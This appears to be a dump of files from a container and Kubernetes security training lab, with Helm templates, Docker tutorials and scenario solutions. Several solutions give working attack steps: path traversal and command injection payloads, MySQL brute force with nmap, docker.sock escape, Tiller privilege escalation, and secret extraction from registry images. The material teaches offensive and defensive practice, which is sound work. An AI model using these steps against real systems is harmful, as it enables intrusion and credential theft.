LoadBalancer IP to be available. 14 | You can watch the status of by running 'kubectl get svc -w {{ include "server-health.fullname" . }}' 15 | export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "server-health.fullname" . }} -o jsonpath='{.status.loadBalancer.ingress[0].ip}') 16 | echo http://$SERVICE_IP:{{ .Values.service.port }} 17 | {{- else if contains "ClusterIP" .Values.service.type }} 18 | export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "server-health.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}") 19 | echo "Visit http://127.0.0.1:8080 to use your application" 20 | kubectl port-forward $POD_NAME 8080:80 21 | {{- end }} 22 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/NOTES.txt: -------------------------------------------------------------------------------- 1 | 1. Get the application URL by running these commands: 2 | {{- if .Values.ingress.enabled }} 3 | {{- range $host := .Values.ingress.hosts }} 4 | {{- range $.Values.ingress.paths }} 5 | http{{ if $.Values.ingress.tls }}s{{ end }}://{{ $host }}{{ . }} 6 | {{- end }} 7 | {{- end }} 8 | {{- else if contains "NodePort" .Values.service.type }} 9 | export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "mailbox-service.fullname" . }}) 10 | export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}") 11 | echo http://$NODE_IP:$NODE_PORT 12 | {{- else if contains "LoadBalancer" .Values.service.type }} 13 | NOTE: It may take a few minutes for the LoadBalancer IP to be available. 14 | You can watch the status of by running 'kubectl get svc -w {{ include "mailbox-service.fullname" . }}' 15 | export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "mailbox-service.fullname" . }} -o jsonpath='{.status.loadBalancer.ingress[0].ip}') 16 | echo http://$SERVICE_IP:{{ .Values.service.port }} 17 | {{- else if contains "ClusterIP" .Values.service.type }} 18 | export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "mailbox-service.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}") 19 | echo "Visit http://127.0.0.1:8080 to use your application" 20 | kubectl port-forward $POD_NAME 8080:80 21 | {{- end }} 22 | -------------------------------------------------------------------------------- /gitbook/advanced-concepts/docker-compoe-wordpress.md: -------------------------------------------------------------------------------- 1 | # docker-compose wordpress setup 2 | 3 | Compose is a tool for defining and running multi-container Docker applications. With Compose, you use a Compose file to configure your application's services. Then, using a single command, you create and start all the services from your configuration 4 | 5 | 6 | * Let's setup wordpress site using docker-compose 7 | 8 | ```bash 9 | cd /opt/wordpress 10 | docker-compose up -d 11 | ``` 12 | 13 | ![docker compose wordpress](images/docker-compose-wordpress.png) 14 | 15 | * Access the wordpress site using `http://STUDENTVMIP:8000` 16 | 17 | ![wordpress site](images/wordpress-site.png) 18 | 19 | > Ignore any error related to broken CSS. This is due to IP address mismatch in Wordpress configuration. 20 | 21 | ## Looking at `docker-compose.yml` 22 | 23 | * Inspecting the compose file by running `less /opt/wordpress/docker-compose.yml` 24 | 25 | ```yml 26 | version: '3.3' 27 | 28 | services: 29 | db: 30 | image: mysql:5.7 31 | volumes: 32 | - db_data:/var/lib/mysql 33 | restart: always 34 | environment: 35 | MYSQL_ROOT_PASSWORD: SuperSecret321 36 | MYSQL_DATABASE: wordpress 37 | MYSQL_USER: wordpress 38 | MYSQL_PASSWORD: ComplicatedPassword 39 | 40 | wordpress: 41 | depends_on: 42 | - db 43 | image: wordpress:latest 44 | ports: 45 | - "8000:80" 46 | restart: always 47 | environment: 48 | WORDPRESS_DB_HOST: db:3306 49 | WORDPRESS_DB_USER: wordpress 50 | WORDPRESS_DB_PASSWORD: ComplicatedPassword 51 | volumes: 52 | db_data: 53 | ``` 54 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/NOTES.txt: -------------------------------------------------------------------------------- 1 | 1. Get the application URL by running these commands: 2 | {{- if .Values.ingress.enabled }} 3 | {{- range $host := .Values.ingress.hosts }} 4 | {{- range $.Values.ingress.paths }} 5 | http{{ if $.Values.ingress.tls }}s{{ end }}://{{ $host }}{{ . }} 6 | {{- end }} 7 | {{- end }} 8 | {{- else if contains "NodePort" .Values.service.type }} 9 | export NODE_PORT=$(kubectl get --namespace {{ .Release.Namespace }} -o jsonpath="{.spec.ports[0].nodePort}" services {{ include "connectivity-check.fullname" . }}) 10 | export NODE_IP=$(kubectl get nodes --namespace {{ .Release.Namespace }} -o jsonpath="{.items[0].status.addresses[0].address}") 11 | echo http://$NODE_IP:$NODE_PORT 12 | {{- else if contains "LoadBalancer" .Values.service.type }} 13 | NOTE: It may take a few minutes for the LoadBalancer IP to be available. 14 | You can watch the status of by running 'kubectl get svc -w {{ include "connectivity-check.fullname" . }}' 15 | export SERVICE_IP=$(kubectl get svc --namespace {{ .Release.Namespace }} {{ include "connectivity-check.fullname" . }} -o jsonpath='{.status.loadBalancer.ingress[0].ip}') 16 | echo http://$SERVICE_IP:{{ .Values.service.port }} 17 | {{- else if contains "ClusterIP" .Values.service.type }} 18 | export POD_NAME=$(kubectl get pods --namespace {{ .Release.Namespace }} -l "app.kubernetes.io/name={{ include "connectivity-check.name" . }},app.kubernetes.io/instance={{ .Release.Name }}" -o jsonpath="{.items[0].metadata.name}") 19 | echo "Visit http://127.0.0.1:8080 to use your application" 20 | kubectl port-forward $POD_NAME 8080:80 21 | {{- end }} 22 | -------------------------------------------------------------------------------- /gitbook/scenario-5/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking applications in different namespaces in Kubernetes cluster - Solution 2 | 3 | * Get pod details and login to the `net-tools` pod using below command. 4 | 5 | ```bash 6 | export NET_TOOLS_POD=$(kubectl get pods --selector app=net-tools -o jsonpath="{.items[0].metadata.name}") 7 | kubectl exec -it $NET_TOOLS_POD bash 8 | ``` 9 | 10 | ![](images/get-pod-name.png) 11 | 12 | * As MySQL runs on port 3306 by default, we can scan the IP range for this port 13 | 14 | ```bash 15 | nmap -n -Pn -p3306 --open -sS -T5 10.36.4.0/24 16 | ``` 17 | 18 | ![](images/nmap-scan.png) 19 | 20 | * Once we have discovered the MySQL service, we can brute force the credentials to login into the server. We can run a brute force attack using nmap and its scripting engine. 21 | 22 | ```bash 23 | echo root > users.txt 24 | nmap --script mysql-brute 10.36.4.30 -p3306 -T4 --script-args "userdb=users.txt" 25 | ``` 26 | 27 | ![](images/nmap-mysql-bruteforce.png) 28 | 29 | * Once the credentials are discovered, we can access the MySQL instance with obtained password within the cluster network in different namespace 30 | 31 | ```bash 32 | mysql -u root -psecret -h 10.36.4.30 33 | ``` 34 | 35 | ![](images/mysql-access.png) 36 | 37 | 38 | * Verify the pods, svc available in the `database` namespace 39 | 40 | ```bash 41 | kubectl get ns 42 | kubectl get all -n database 43 | ``` 44 | 45 | ![](images/get-ns-data.png) 46 | 47 | ### Refernces 48 | 49 | * [https://ahmet.im/blog/kubernetes-network-policy/](https://ahmet.im/blog/kubernetes-network-policy/) 50 | * [Google Cloud Cluster CIDR](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/dockerfile.md: -------------------------------------------------------------------------------- 1 | # Dockerfile 2 | 3 | A `Dockerfile` is a configuration file that contains instructions for building a Docker image 4 | 5 | * Provides a more effective way to build images compared to using docker commit 6 | * Easily fits into your continuous integration and deployment process 7 | 8 | 9 | ## Example Dockerfile 10 | 11 | * `FROM` instruction specifies what the base image should be 12 | * `RUN` instruction specifies a command to execute 13 | * `CMD` is to provide defaults for an executing container 14 | 15 | ```Dockerfile 16 | # Example of a comment 17 | FROM ubuntu 18 | 19 | RUN apt-get update 20 | RUN apt-get install curl -y 21 | RUN apt-get install htop -y 22 | 23 | CMD ["htop"] 24 | ``` 25 | 26 | ## Create a simple htop container 27 | 28 | * Create new directory and change to the directory 29 | 30 | ```bash 31 | mkdir htop-container 32 | cd htop-container 33 | ``` 34 | 35 | * Create below file using `vi Dockerfile` 36 | 37 | ```Dockerfile 38 | FROM ubuntu 39 | LABEL MAINTAINER "user@domain.com" 40 | 41 | RUN apt-get update && apt-get install -y \ 42 | curl \ 43 | htop 44 | 45 | CMD ["htop"] 46 | ``` 47 | 48 | * Build the docker container 49 | 50 | ```bash 51 | docker build -t abh1sek/htop:1.0 . 52 | ``` 53 | 54 | ![building docker image](images/docker-build-image.png) 55 | 56 | * Running the `htop` container 57 | 58 | ```bash 59 | docker run --rm -it abh1sek/htop:1.0 60 | ``` 61 | 62 | ## References 63 | 64 | * [Dockerfile reference](https://docs.docker.com/engine/reference/builder) 65 | * [Best practices for writing Dockerfiles](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/) -------------------------------------------------------------------------------- /gitbook/extra/control-groups.md: -------------------------------------------------------------------------------- 1 | # Control Groups 2 | 3 | The kernel uses cgroups also known as control groups to group processes for the purpose of system resource management. Cgroups allocate CPU time, system memory, network bandwidth, or combinations of these among user-defined groups of tasks. 4 | 5 | * Let's run two containers with different cpu shares 6 | 7 | ```bash 8 | docker run -d --name='low_priority' \ 9 | --cpuset-cpus=0 --cpu-shares=10 alpine md5sum /dev/urandom 10 | 11 | docker run -d --name='high_priority' \ 12 | --cpuset-cpus=0 --cpu-shares=50 alpine md5sum /dev/urandom 13 | ``` 14 | 15 | * Now we can see the utilization status by running `htop` 16 | 17 | ```bash 18 | docker run --rm -it --pid host jess/htop 19 | ``` 20 | 21 | ![cgroup with shares](images/cgroup-with-shares.png) 22 | 23 | * Stop and remove the running containers 24 | 25 | ```bash 26 | docker stop low_priority high_priority 27 | docker rm low_priority high_priority 28 | ``` 29 | 30 | * Now run the containers without any cpu shares specified 31 | 32 | ```bash 33 | docker run -d --name='low_priority' alpine md5sum /dev/urandom 34 | docker run -d --name='high_priority' alpine md5sum /dev/urandom 35 | ``` 36 | 37 | * Check resource utilization using `htop` 38 | 39 | ```bash 40 | docker run --rm -it --pid host jess/htop 41 | ``` 42 | 43 | ![cgroup without shares](images/cgroup-with-out-shares.png) 44 | 45 | * Stop and remove the running containers 46 | 47 | ```bash 48 | docker stop low_priority high_priority 49 | docker rm low_priority high_priority 50 | ``` 51 | 52 | 53 | ## References 54 | 55 | * [Limit a container's resources](https://docs.docker.com/v17.09/engine/admin/resource_constraints/) -------------------------------------------------------------------------------- /gitbook/attacking-private-registry/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking Private Registry - Solution 2 | 3 | * Understanding the API structure of the docker private registry to list of images 4 | 5 | ```bash 6 | curl 165.22.221.65:5000/v2/_catalog 7 | ``` 8 | 9 | * Get the list of tags for the images 10 | 11 | ```bash 12 | curl 165.22.221.65:5000/v2/privatecode/tags/list 13 | ``` 14 | 15 | ![List images with tags in private registry](images/private-registry-list.png) 16 | 17 | 18 | * Add the insecure-registry flag to download docker image at `vi /lib/systemd/system/docker.service` 19 | 20 | ```bash 21 | ExecStart=/usr/bin/dockerd -H fd:// --insecure-registry 165.22.221.65:5000 22 | ``` 23 | 24 | * Then restart the service 25 | 26 | ```bash 27 | sudo systemctl daemon-reload 28 | sudo service docker restart 29 | ``` 30 | 31 | * Download the image from private registry 32 | 33 | ```bash 34 | docker pull 165.22.221.65:5000/privatecode:golang-developer-team 35 | ``` 36 | 37 | ![pulling docker image](images/pull-docker.png) 38 | 39 | * Enter into the container using the below command. Look for interesting file and folders 40 | 41 | ```bash 42 | docker run --rm -it 165.22.221.65:5000/privatecode:golang-developer-team sh 43 | 44 | cd /app 45 | ls -la 46 | ``` 47 | 48 | ![entering into container for analysis](images/enter-into-container.png) 49 | 50 | * Now look at the commit logs for git 51 | 52 | ```bash 53 | git log 54 | ``` 55 | 56 | ![git commit logs](images/commit-log.png) 57 | 58 | * Then revert to the commit where environment variables are there. Then look for files and secrets 59 | 60 | ```bash 61 | git checkout f17a07721ab9acec96aef0b1794ee466e516e37a 62 | 63 | ls -la 64 | 65 | cat .env 66 | ``` 67 | 68 | ![revert and look for secrets](images/revert-and-secrets.png) -------------------------------------------------------------------------------- /gitbook/getting-started/kubernetes-cluster-setup.md: -------------------------------------------------------------------------------- 1 | # Kubernetes Cluster Setup 2 | 3 | We will setup a Kubernetes cluster in Google Cloud. For this, you will require: 4 | 5 | 1. Google Cloud account 6 | 2. [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/) 7 | 3. [Helm 2](https://v2.helm.sh/docs/install/) 8 | 4. [gcloud](https://cloud.google.com/sdk/install) 9 | 10 | * Ensure `gcloud` is configured and able to access your Google Cloud account. This can be verified using 11 | 12 | ``` 13 | gcloud projects lists 14 | ``` 15 | 16 | * Ensure you have `helm2` symlink pointing to the Helm v2.x binary. The setup script uses `helm2` to invoke Helm v2. 17 | 18 | > **NOTE:** Setting up a cluster in Google cloud may incur cost. Refer to `setup.sh` on the resources created. 19 | 20 | ## Create Cluster 21 | 22 | ``` 23 | export STUDENTPROJECTNAME="Google-Cloud-Project-Name" 24 | ./setup.sh 25 | ``` 26 | 27 | > The cluster creation script `setup.sh` will generate a script `destroy.sh` that can be used to delete the resources created on Google cloud 28 | 29 | The `setup.sh` will 30 | 31 | 1. Create a Kubernetes cluster on Google cloud using `gcloud` 32 | 2. Allocate a static IP address for Ingress 33 | 3. Deploy vulnerable apps and config 34 | 4. Generate `kubeconfig` file in current directory 35 | 5. Generate `destroy.sh` script to destroy [1] and [2] 36 | 37 | ## Expose Vulnerable Apps 38 | 39 | ``` 40 | sudo kubectl port-forward -n kube-system svc/nginx-ingress-controller 80:80 41 | ``` 42 | 43 | The default ingress `app-ingress/app-ingress.yml` uses host names that resolves to `127.0.0.1`. The above command will forward port 80 on localhost to the `Nginx Ingress` service running inside the cluster. 44 | 45 | ## Destroy Cluster 46 | 47 | ``` 48 | ./destroy.sh 49 | ``` -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/capabilities.md: -------------------------------------------------------------------------------- 1 | # Capabilities 2 | 3 | Capabilities turn the binary "root/non-root" into a fine-grained access control system. Processes (like web servers) that just need to bind on a port below 1024 do not have to run as root, they can just be granted the `net_bind_service` capability instead. 4 | 5 | > Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. 6 | 7 | ## Capabilities Demonstration 8 | 9 | * Let's run ping command in a container 10 | 11 | ```bash 12 | docker run --rm -it alpine sh 13 | 14 | ping 127.0.0.1 -c 2 15 | ``` 16 | 17 | ![capabilities ping](images/capabilities-ping.png) 18 | 19 | * Now, let's remove the `CAP_NET_RAW` capability and try again 20 | 21 | ```bash 22 | docker run --rm -it --cap-drop=NET_RAW alpine sh 23 | 24 | ping 127.0.0.1 -c 2 25 | ``` 26 | 27 | ![capabilities ping drop](images/capabilities-ping-drop.png) 28 | 29 | 30 | ## Checking for the list of capabilities 31 | 32 | * We can check the list of capabilities applied the container or system using the below command 33 | 34 | ```bash 35 | docker run --rm -it 71aa5f3f90dc bash 36 | 37 | capsh --print 38 | ``` 39 | 40 | ![capsh print](images/capsh-print.png) 41 | 42 | 43 | ## Running the full privileged container 44 | 45 | * Run the below command to start a privileged container 46 | 47 | ```bash 48 | docker run --rm -it --privileged=true 71aa5f3f90dc bash 49 | 50 | capsh --print 51 | ``` 52 | 53 | ![privileged container](images/privileged-container.png) 54 | 55 | * It is possible to access the host devices from the privileged containers using `more /dev/kmsg` 56 | 57 | > The /dev/kmsg character device node provides userspace access to the kernel's printk buffer. 58 | 59 | ![/dev/kmsg log](images/privileged-container-kmsg.png) -------------------------------------------------------------------------------- /gitbook/scenario-6/solution.md: -------------------------------------------------------------------------------- 1 | # Attacking Helm tiller without RBAC setup - Solution 2 | 3 | * Let's assume that you already have access to a pod inside a cluster using an application vulnerability (Ex: Command Injection) 4 | 5 | * Then we can run the below command to deploy simple pod which contains `helm` and `kubectl` binaries 6 | 7 | ```bash 8 | kubectl run -n default --quiet --rm --restart=Never -ti --image=madhuakula/helm-security incluster 9 | ``` 10 | 11 | ![](images/deploy-pod.png) 12 | 13 | * If we check the version of the helm, it responds with `Error: pods is forbidden: User "system:serviceaccount:default:default" cannot list pods in the namespace "kube-system"`. Means client not able to establish connection with server 14 | 15 | ```bash 16 | helm version 17 | ``` 18 | 19 | * Let's telnet to Tiller's default service and port. We can connect to `tiller-deploy.kube-system` on port `44134` 20 | 21 | ```bash 22 | telnet tiller-deploy.kube-system 44134 23 | 24 | Ctrl+C 25 | ``` 26 | 27 | ![](images/telnet-tiller.png) 28 | 29 | * Now we can use the helm with host flag to talk to the server `helm --host tiller-deploy.kube-system:44134 version` 30 | 31 | ![](images/helm-with-host-flag.png) 32 | 33 | * Let's try getting the secrets from `kube-system` namespace using kubectl `kubectl get secrets -n kube-system`. We can clearly see that we can't get the secrets with default service account attached to this pod 34 | 35 | ![](images/kubectl-secrets-before-attack.png) 36 | 37 | * Let's go ahead and deploy our `pwnchart` helm chart 38 | 39 | ```bash 40 | helm --host tiller-deploy.kube-system:44134 install /pwnchart 41 | ``` 42 | 43 | ![](images/helm-deploy-pwnchart.png) 44 | 45 | * Now let's try again to get the secrets from `kube-system` namespace using kubectl `kubectl get secrets -n kube-system`. 46 | 47 | ![](images/kube-secrets-after-attack.png) 48 | 49 | * We now have full cluster access to do whatever a cluster admin can do -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: {{ include "server-health.fullname" . }} 5 | labels: 6 | app.kubernetes.io/name: {{ include "server-health.name" . }} 7 | helm.sh/chart: {{ include "server-health.chart" . }} 8 | app.kubernetes.io/instance: {{ .Release.Name }} 9 | app.kubernetes.io/managed-by: {{ .Release.Service }} 10 | spec: 11 | replicas: {{ .Values.replicaCount }} 12 | selector: 13 | matchLabels: 14 | app.kubernetes.io/name: {{ include "server-health.name" . }} 15 | app.kubernetes.io/instance: {{ .Release.Name }} 16 | template: 17 | metadata: 18 | labels: 19 | app.kubernetes.io/name: {{ include "server-health.name" . }} 20 | app.kubernetes.io/instance: {{ .Release.Name }} 21 | spec: 22 | containers: 23 | - name: {{ .Chart.Name }} 24 | image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}" 25 | imagePullPolicy: {{ .Values.image.pullPolicy }} 26 | ports: 27 | - name: http 28 | containerPort: 80 29 | protocol: TCP 30 | livenessProbe: 31 | tcpSocket: 32 | port: http 33 | initialDelaySeconds: 15 34 | periodSeconds: 20 35 | readinessProbe: 36 | tcpSocket: 37 | port: http 38 | initialDelaySeconds: 5 39 | periodSeconds: 10 40 | resources: 41 | {{- toYaml .Values.resources | nindent 12 }} 42 | {{- with .Values.nodeSelector }} 43 | nodeSelector: 44 | {{- toYaml . | nindent 8 }} 45 | {{- end }} 46 | {{- with .Values.affinity }} 47 | affinity: 48 | {{- toYaml . | nindent 8 }} 49 | {{- end }} 50 | {{- with .Values.tolerations }} 51 | tolerations: 52 | {{- toYaml . | nindent 8 }} 53 | {{- end }} 54 | -------------------------------------------------------------------------------- /gitbook/attacking-auditing-docker-registry/docker-registries.md: -------------------------------------------------------------------------------- 1 | # Auditing Docker Registries 2 | 3 | A Docker registry is a distribution system for Docker images. There will be different images and each may contain multiple tags and versions. By default the registry runs on port `5000` without authentication and TLS. 4 | 5 | In this section, we will be using a simple unauthenticated docker private registry to perform security audit. 6 | 7 | 8 | * We can check if the docker registry is up by running the following command in the student VM 9 | 10 | ```bash 11 | curl -s http://localhost:5000/v2/_catalog | jq . 12 | ``` 13 | 14 | ![docker registry access](images/docker-registry-access.png) 15 | 16 | * Get the list of tags and versions of a docker image from the registry 17 | 18 | ```bash 19 | curl -s http://localhost:5000/v2/devcode/tags/list | jq . 20 | ``` 21 | 22 | ![docker image tags list](images/docker-registry-access-image.png) 23 | 24 | 25 | * Downloading a registry image locally 26 | 27 | ```bash 28 | docker pull localhost:5000/devcode:latest 29 | ``` 30 | 31 | ![download image locally](images/download-image-locally.png) 32 | 33 | * Reviewing the container for sensitive data and hard-coded secrets 34 | 35 | ```bash 36 | docker run --rm -it localhost:5000/devcode:latest sh 37 | 38 | cat /.aws/credentials 39 | ``` 40 | 41 | ![docker secrets analysis](images/docker-analysis-secrets.png) 42 | 43 | 44 | * Lets check the default docker daemon configuration. This prints the default username and registry used by the docker run time 45 | 46 | ``` 47 | docker system info 48 | ``` 49 | 50 | ![docker system info registries](images/docker-system-info-registries.png) 51 | 52 | * Lets look for the configured registries from the host. The credentials may authorize us to pull and/or push images to the registry 53 | 54 | ``` 55 | cat ~/.docker/config.json 56 | ``` 57 | 58 | ![docker registry config secrets](images/docker-registry-config-secrets.png) 59 | -------------------------------------------------------------------------------- /gitbook/kubesec/readme.md: -------------------------------------------------------------------------------- 1 | # Running kubesec.io 2 | 3 | Kubesec quantifies risk for Kubernetes resources by validating the configuration files and manifest files used for Kubernetes deployments and operations. 4 | 5 | ## How to run kubesec 6 | 7 | * Replace the `${FILE}` with the filename which you want to perform the scan 8 | 9 | ```bash 10 | cd /data/kubesec 11 | curl --silent --compressed --connect-timeout 5 https://kubesec.io -F file=@"${FILE}" 12 | ``` 13 | 14 | * Run for the `insecuredeployment.yaml` 15 | 16 | ```yaml 17 | apiVersion: v1 18 | kind: Pod 19 | metadata: 20 | name: kubesec-demo 21 | spec: 22 | containers: 23 | - name: kubesec-demo 24 | image: gcr.io/google-samples/node-hello:1.0 25 | securityContext: 26 | privileged: true 27 | readOnlyRootFilesystem: true 28 | ``` 29 | 30 | ```bash 31 | curl --silent --compressed --connect-timeout 5 https://kubesec.io -F file=@"insecuredeployment.yaml" 32 | ``` 33 | 34 | ![](images/insecure-deployment.png) 35 | 36 | 37 | * Run for the `securedeployment.yaml` 38 | 39 | ```yaml 40 | apiVersion: v1 41 | kind: Pod 42 | metadata: 43 | name: kubesec-demo 44 | spec: 45 | containers: 46 | - name: kubesec-demo 47 | image: gcr.io/google-samples/node-hello:1.0 48 | securityContext: 49 | runAsNonRoot: true 50 | capabilities: 51 | drop: ["ALL"] 52 | add: ["NET_ADMIN", "SYS_TIME"] 53 | readOnlyRootFilesystem: true 54 | runAsUser: 100000 55 | resources: 56 | requsts: 57 | cpu: 20m 58 | memory: 30Mi 59 | limits: 60 | cpu: 10m 61 | memory: 20Mi 62 | ``` 63 | 64 | ```bash 65 | curl --silent --compressed --connect-timeout 5 https://kubesec.io -F file=@"securedeployment.yaml" 66 | ``` 67 | 68 | ![](images/secure-deployment.png) 69 | 70 | ### References 71 | * [https://kubesec.io](https://kubesec.io/) 72 | * [https://xsses.rocks/kubernetes-systems-hacked-to-mine-xmr](https://xsses.rocks/kubernetes-systems-hacked-to-mine-xmr/) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/docker-run.md: -------------------------------------------------------------------------------- 1 | # Docker run 2 | 3 | ### Running docker container 4 | 5 | * Run the following command to start an Ubuntu container 6 | 7 | ```bash 8 | docker run ubuntu:latest echo "Welcome to Ubuntu" 9 | ``` 10 | 11 | ![welcome ubuntu docker](images/docker-run-welcome-ubuntu.png) 12 | 13 | 14 | * Run the following command to start an Ubuntu container with interactive bash shell 15 | 16 | ```bash 17 | docker run --name samplecontainer -it ubuntu:latest /bin/bash 18 | ``` 19 | 20 | ![docker interactive bash](images/docker-interactive-bash.png) 21 | 22 | ### Find your containers 23 | 24 | * Listing running containers 25 | 26 | ```bash 27 | docker ps 28 | ``` 29 | 30 | ![docker ps](images/docker-ps.png) 31 | 32 | * Listing all containers (runing/stopped) 33 | 34 | ```bash 35 | docker ps -a 36 | ``` 37 | 38 | ![docker ps -a](images/docker-ps-a.png) 39 | 40 | 41 | ### Listing docker images 42 | 43 | ```bash 44 | docker images 45 | ``` 46 | 47 | ![docker images](images/docker-images.png) 48 | 49 | 50 | ### Running container in detached Mode 51 | 52 | * Run an alpine container in the background 53 | 54 | ```bash 55 | docker run --name pingcontainer -d alpine:latest ping 127.0.0.1 -c 50 56 | ``` 57 | 58 | * Looking at the logs (stdout) of a container 59 | 60 | ``` 61 | docker logs -f pingcontainer 62 | ``` 63 | 64 | ![docker detach logs](images/docker-detach-logs.png) 65 | 66 | ### Running nginx container and access the service 67 | 68 | ```bash 69 | docker run -d --name nginxalpine -p 7777:80 nginx:alpine 70 | ``` 71 | 72 | * Accessing the container service from the host system using mapped port 73 | 74 | ```bash 75 | curl localhost:7777 76 | ``` 77 | 78 | ![accessing nginx from host](images/nginxalpine-host.png) 79 | 80 | * Accessing the container service using the container IP and container port 81 | 82 | ```bash 83 | docker exec -it nginxalpine sh 84 | 85 | ip addr 86 | 87 | curl 172.17.0.2:80 88 | ``` 89 | 90 | ![accessing nginx from container port](images/nginxalpine-container.png) -------------------------------------------------------------------------------- /gitbook/scenario-1/solution.md: -------------------------------------------------------------------------------- 1 | # Exploiting Private Registry via Misconfiguration - Solution 2 | 3 | * Navigate to the application `http://mailbox-service.student-uniquename.cloudsec.training` 4 | 5 | * Login to the application using `username: bob` and `password: bobmailbox` 6 | 7 | ![](images/app-login.png) 8 | 9 | * We can see that `README.md` discloses information regarding the private registry 10 | 11 | ![](images/information-disclosure.png) 12 | 13 | 14 | * It appears that the `page` parameter is vulnerable to an Insecure Direct Object Reference, potentially allowing us to read other files on the system. 15 | 16 | * Let's try out a common payload and see if this IDOR is actually a path traversal vulnerability. We can gain read a local files using payload `qqqqq/../../etc/passwd` 17 | 18 | ![](images/path-traversal-exploitation.png) 19 | 20 | * Similarly we can read other sensitive files in the system and find that the system contains `/root/.docker/config.json` with payload `qqqqq/../../root/.docker/config.json` 21 | 22 | ![](images/docker-config.png) 23 | 24 | * We can use this docker configuration to pull docker images from private registry. Save the `config.json` file onto your system 25 | 26 | * Run the following command to configure the docker private registry using configuration file. 27 | 28 | ```bash 29 | docker login -u _json_key -p "$(cat config.json)" https://gcr.io 30 | ``` 31 | 32 | ![](images/docker-registry-login.png) 33 | 34 | * Now pull the private registry image to get the backend source code 35 | 36 | ```bash 37 | docker pull gcr.io/training-automation-stuff/backend-source-code:latest 38 | ``` 39 | 40 | ![](images/pull-private-image.png) 41 | 42 | * Inspecting the image using the docker run command 43 | 44 | ```bash 45 | docker run --rm -it gcr.io/training-automation-stuff/backend-source-code:latest sh 46 | ls -la 47 | cat index.js 48 | ``` 49 | 50 | ![](images/source-code-hardcoded-key.png) 51 | 52 | * Now you can see that we have got the `NASA_DEMO_API_KEY` which is hard coded in the container image -------------------------------------------------------------------------------- /gitbook/scenario-4/solution.md: -------------------------------------------------------------------------------- 1 | # Docker escape using Pod Volume Mounts to access the node and host systems - Solution 2 | 3 | * Navigate to the application `http://connectivity-check.student-uniquename.cloudsec.training` 4 | 5 | * Login to the application using `username: sysadmin` and `password: superpowers` 6 | 7 | ![](images/app-login.png) 8 | 9 | * Now try pinging `google.com` 10 | 11 | ![](images/ping-google.png) 12 | 13 | * We can see that application is running the `ping` system command by looking at the output. Let's run some other system command by using a semicolon to separate two commands, as we know it's running in Linux system. For example, providing an input of `google.com; id` would trigger `ping -c 2 google.com;id` in the backend. 14 | 15 | ![](images/ping-google-id.png) 16 | 17 | * Now that we have confirmed that the application is vulnerable to a command injection vulnerability. we can execute other commands and do other interesting stuff within this container. 18 | 19 | * Let's explore the file system and other services. Start by looking inside the custom docker container. 20 | 21 | ```bash 22 | ;ls -l /custom/docker/ 23 | ``` 24 | 25 | ![](images/custom-docker-socket.png) 26 | 27 | * Looks like the `docker.sock` is mounted from the host system as a volume mount 28 | 29 | * Download the docker binary to access this socket and perform docker operations within the container 30 | 31 | ```bash 32 | ;wget https://download.docker.com/linux/static/stable/x86_64/docker-18.09.1.tgz -O /root/docker-18.09.1.tgz 33 | ``` 34 | 35 | ![](images/download-docker.png) 36 | 37 | * Now let's extract the binary to root system 38 | 39 | ```bash 40 | ;tar -xvzf /root/docker-18.09.1.tgz -C /root/ 41 | ``` 42 | 43 | ![](images/extract-docker-binary.png) 44 | 45 | * Now, we can gain access to the host system by running the following docker commands 46 | 47 | ```bash 48 | ;/root/docker/docker -H unix:///custom/docker/docker.sock ps 49 | 50 | ;/root/docker/docker -H unix:///custom/docker/docker.sock images 51 | ``` 52 | 53 | ![](images/host-docker-containers.png) 54 | 55 | ![](images/host-docker-images.png) -------------------------------------------------------------------------------- /gitbook/getting-started-with-docker/README.md: -------------------------------------------------------------------------------- 1 | # Getting started with docker 2 | 3 | ## Introduction 4 | 5 | Docker containers wrap a piece of software in a complete filesystem that contains everything needed to run: code, runtime, system tools, system libraries and anything that can be installed on a server. This guarantees that the software will always run the same, regardless of its environment. 6 | 7 | 8 | ### Run your first docker container 9 | 10 | ```bash 11 | docker run hello-world 12 | ``` 13 | 14 | * When you run `docker run` command 15 | * Docker engine checks if the image is available or not 16 | * If image is not available, docker engine will pull from docker registry 17 | * If image is available, docker engine will run the command locally 18 | 19 | 20 | ![docker hello world container](images/helloworld-docker.png) 21 | 22 | ### How Docker Works? 23 | 24 | * `Docker` is the program that enables containers to be built, shipped and run 25 | * Docker Engine uses Linux Kernel namespaces and control groups 26 | 27 | ![Docker Architecture](images/docker-architecture.png) 28 | 29 | Image Reference: https://docs.docker.com/engine/docker-overview/ 30 | 31 | ### Terminology 32 | 33 | * Docker Image 34 | * Read only file with OS, libraries and apps 35 | * Anyone can create a docker image 36 | * Images can be stored in Docker hub (default public registry) or private registry 37 | * Docker Container 38 | * Stateful instance of an image with a writable layer 39 | * Contains everything needed to run your application 40 | * Based on one or more images 41 | * Docker Registry 42 | * Repository of images 43 | * Docker Hub 44 | * Public docker registry 45 | 46 | ### What is 